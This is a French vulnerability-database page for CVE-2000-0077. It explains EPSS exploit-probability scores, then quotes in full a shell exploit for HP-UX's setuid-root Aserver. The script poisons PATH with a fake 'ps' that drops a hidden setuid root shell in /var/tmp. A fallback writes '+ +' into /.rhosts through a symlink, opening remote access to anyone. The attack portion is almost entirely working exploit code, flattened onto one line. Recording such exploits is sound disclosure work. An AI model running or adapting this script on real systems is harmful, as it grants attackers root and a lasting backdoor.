CVE-2000-0077 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

# source: https://www.securityfocus.com/bid/1929/info # # Aserver is a server program that ships with HP-UX versions 10.x and above that is used to interface client applications with the audio hardware. Because it talks to hardware, it is installed setuid root by default. # # During normal execution, Aserver executes "ps" via the system() libcall, relying on the PATH environment variable to do so. As a result, a user can modify their PATH environment variable so that it includes an arbitrary program called 'ps' before executing Aserver. When Aserver is run with the -f argument, the offending system() function will be called and the attacker's version of ps will be executed as root. # # This is a trivial root compromise. # #!/bin/sh # # HP-UX aserver.sh - Loneguard 18/10/98 # Simple no brainer path poison followed by a twist [ inspired by DC ;) ] # cd /var/tmp cat < _EOF > ps #!/bin/sh cp /bin/csh /var/tmp/.foosh chmod 4755 /var/tmp/.foosh _EOF chmod 755 ps PATH=.:$PATH /opt/audio/bin/Aserver -f if [ -e /var/tmp/.foosh ] # Hmmm, you not like that technique? cd /tmp rm last_uuid ln -s /.rhosts last_uuid /opt/audio/bin/Aserver -f echo "+ +" > /.rhosts # Haha, my Kungfu is the best! fi echo Crazy MONKEY!